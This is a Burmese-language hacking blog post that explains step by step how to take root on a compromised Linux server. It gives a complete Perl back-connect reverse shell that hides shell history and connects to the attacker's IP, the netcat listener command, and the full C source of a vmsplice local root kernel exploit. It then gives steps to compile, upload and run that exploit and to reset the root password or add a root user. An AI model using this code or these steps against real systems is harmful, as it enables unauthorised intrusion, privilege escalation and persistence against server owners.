Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ



ပထမဆံုးအေနနဲ ့Root လုပ္မယ့္ Target Server ေပၚမွာ သင့္ရဲ ့ php shell ကို တစ္နည္းနည္းနဲ ့တင္ထားျပီးသားရွိဖို ့လိုအပ္ပါတယ္။

တကယ္လို ့သင့္မွာသာ permission ရွိျပီးသားဆိုရင္ေတာ့ butt.pl ဆိုတဲ ့new file တစ္ခု create လုပ္ရပါမယ္။
( permission မရေသးရင္ေတာ့ Perl scrip ကို PHP inclusion နဲ ့execute လုပ္လို ့ရပါတယ္ အဲ့လိုလုပ္တဲ့နည္းကိုလဲ ေနာက္သပ္သပ္ ကြ်န္ေတာ္ tutorial ေရးေပးပါ့မယ္ )

ခုနက အသစ္ create လုပ္ထားတဲ့ butt.pl ထဲမွာထည့္ရမယ့္ code ေတြကေတာ့

#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR  \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF


ျပီးရင္ေတာ့ သင့္ Router ထဲကေန Port 8080 ကို forward လုပ္လုိက္ပါ။
ေအာက္က command ကို အသံုးျပဳျပီးေတာ့ shell ကို execute လုပ္ပါ။
ဒါမွမဟုတ္ php script သံုးမယ္ဆိုရင္ေတာ့ script ကို run လုိက္ပါ။
(မွတ္ခ်က္။ ။ php script သံုးမယ္ဆိုရင္ေတာ့ system ကို point လုပ္ဖို ့ script ကို manually change ေပးရမွာျဖစ္ပါတယ္။)

perl butts.pl 192.168.0.254 8080

IP Address ကို သင့္ IP သို ့ေျပာင္းလိုက္ပါ။
ျပီးရင္ေတာ့ terminal ကိုဖြင့္ျပီး ေအာက္က command ကို အသံုးျပဳရပါမယ္။
( Netcat ကိုေတာ့ install လုပ္ဖို ့လိုအပ္ပါမယ္ )

nc -vv -l -n -p 8080

connect လုပ္လို ့ရ မရဆိုတာ ေသခ်ာဖို ့"uname -a;id" ဆိုတဲ့ command ကို သံုးျပီး confirm လုပ္ရပါ့မယ္။ ဒါဆိုရင္ေတာ့ kernel information ကို ရရွိမွာျဖစ္ျပီး အဲ့ info ကို အသံုးခ်ျပီး root လုပ္လုိ ့ရပါျပီ။

ဒီအဆင့္မွာေတာ့ exploit ကို compile လုပ္ဖို ့လိုအပ္လာပါျပီ။ Linux Server အမ်ားစုက compilers ေတြ ကို disable လုပ္ထားေလ့ရွိပါတယ္။ ဒါေၾကာင့္ ကိုယ့္ computer ကေန compile လုပ္ရမွာျဖစ္ပါတယ္။
သတိျပဳဖို ့အေရးၾကီးတာက Window OS ကေနျပီး cross compile လုပ္လို ့မရဘူးဆိုတာပါပဲ။
Linux OS တစ္ခုခု ကေနပဲ compile လုပ္လို ့ရမွာပဲျဖစ္ပါတယ္။

ေအာက္မွာ က်ေနာ္ ျပမယ့္ exploit ဟာ kernel ေတာ္ေတာ္မ်ားမ်ားမွာ 100% အလုပ္လုပ္ပါတယ္။
text file တစ္ခု ဖြင့္ျပီး ေအာက္မွာေဖာ္ျပထားတဲ့ code ကို copy/paste လုပ္ျပီး dongs.c ဆိုျပီး save လုပ္လုိက္ပါ။

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound    14
#define uint        unsigned int
#define static_inline    static inline __attribute__((always_inline))
#define STACK(x)    (x + sizeof(x) - 40)

struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};

void    exit_code();
char    exit_stack[1024 * 1024];

void    die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    316
#endif

#define USER_CS        0x73
#define USER_SS        0x7b
#define USER_FL        0x246

static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice    278
#endif

#define USER_CS        0x23
#define USER_SS        0x2b
#define USER_FL        0x246

static_inline
void    exit_kernel()
{
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

static_inline
void *    get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice    __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)    syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void    kernel_code()
{
    int    i;
    uint    *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }    

    exit_kernel();
}

void    exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}

int    main(int argc, char *argv[])
{
    int        pi[2];
    size_t        map_size;
    char *        map_addr;
    struct iovec    iov;
    struct page *    pages[5];

    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    printf("-----------------------------------\n");
    printf(" Linux vmsplice Local Root Exploit\n");
    printf(" By qaaz\n");
    printf("-----------------------------------\n");

    if (!uid || !gid)
        die("!@#$", 0);

    /*****/
    pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
    pages[1] = pages[0] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[0]);
    printf("[+] page: 0x%lx\n", pages[1]);

    pages[0]->flags    = 1 << PG_compound;
    pages[0]->private  = (unsigned long) pages[0];
    pages[0]->count    = 1;
    pages[1]->lru.next = (long) kernel_code;

    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;

    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);

    pages[2]->flags    = 1 << PG_compound;
    pages[2]->private  = (unsigned long) pages[2];
    pages[2]->count    = 1;
    pages[3]->lru.next = (long) kernel_code;

    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
                    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);

    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
        die("mmap", errno);

    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
        die("munmap", errno);

    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);

    iov.iov_base = map_addr;
    iov.iov_len  = ULONG_MAX;

    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
}

ေနာက္ထပ္ Terminal အသစ္တစ္ခုထပ္ဖြင့္ျပီး ဒီ command ကို ရိုက္လိုက္ပါ။

gcc dongs.c -o dongs

ျပီးရင္ေတာ့ ခုနက save လုပ္ထားတဲ့ dongs ဆိုတဲ့ txt file ကို server ထဲက PHP Shell ေပၚကို upload လုပ္လိုက္ပါ။

ဒီအဆင့္ျပီးရင္ေတာ့ Terminal ကို ျပန္သြားျပီး Netcat ကို လဲ connect လုပ္ထားျပီးရင္ေတာ့ ေအာက္ကေပးထားတဲ့ code ကို ရိုက္ထည့္လိုက္ပါ။

./dongs

ဒါဆိုရင္ေတာ့ exploit ဟာ ေကာင္းေကာင္းအလုပ္လုပ္ျပီး သင့္ကို root access ရရွိေစမွာျဖစ္ပါတယ္။
ေနာက္ဆံုးအဆင့္အေနနဲ ့ root password ကို change ဖို ့ "passwd root" ဆိုတဲ့ command ကိုအသံုးျပဳျပီးေတာ့ ေျပာင္းခ်င္ေျပာင္း ဒါမွမဟုတ္ new root user ဆိုျပီး အသစ္ create ထပ္လုပ္ရင္လုပ္လိုက္ပါ။

ဒါဆိုရင္ေတာ့ Linux Server တစ္ခုကို Root လုပ္လုိ ့ျပီးသြားျပီျဖစ္ပါတယ္။


5 comments to "Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ"

Post a Comment

သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။

Powered by Blogger.

About This Blog

Blogger Tips And Tricks|Latest Tips For Bloggers Free Backlinks

Respect List

Blink Hacker Group

Myanmar Hacker Uniteam

Brotherhood of Myanmar Hackers

and All Myanmar Attackers & All Myanmar Black Hats.

Popular Posts

Followers

Web hosting for webmasters